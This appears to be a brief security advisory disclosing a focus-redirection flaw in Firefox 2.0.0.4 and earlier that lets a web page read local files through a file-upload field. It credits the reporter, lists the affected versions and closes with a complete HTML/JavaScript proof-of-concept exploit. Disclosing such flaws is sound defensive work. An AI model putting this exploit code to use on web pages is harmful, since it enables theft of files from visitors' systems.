|
|
| |
| A vulnerability in Mozilla Firefox allows the attacker to silently redirect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown event is handled, allowing the focus to be moved between the two. This enables the attacker to read arbitrary files on victim's system. |
| |
Credit:
The information has been provided by carl hardwick.
The original article can be found at: http://yathong.googlepages.com/FirefoxFocusBug.html
|
| |
Vulnerable Systems:
* Mozilla Firefox version 2.0.0.4 and prior
Exploit:
<html>
<body>
<script>
function restore()
{
document.getElementById("text1").value=document.getElementById("file1").value;
document.getElementById("text1").focus();
}
function doKeyDown()
{
document.getElementById("label1").focus();
}
</script>
<input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>
|
|
|
|
|
|
|
|
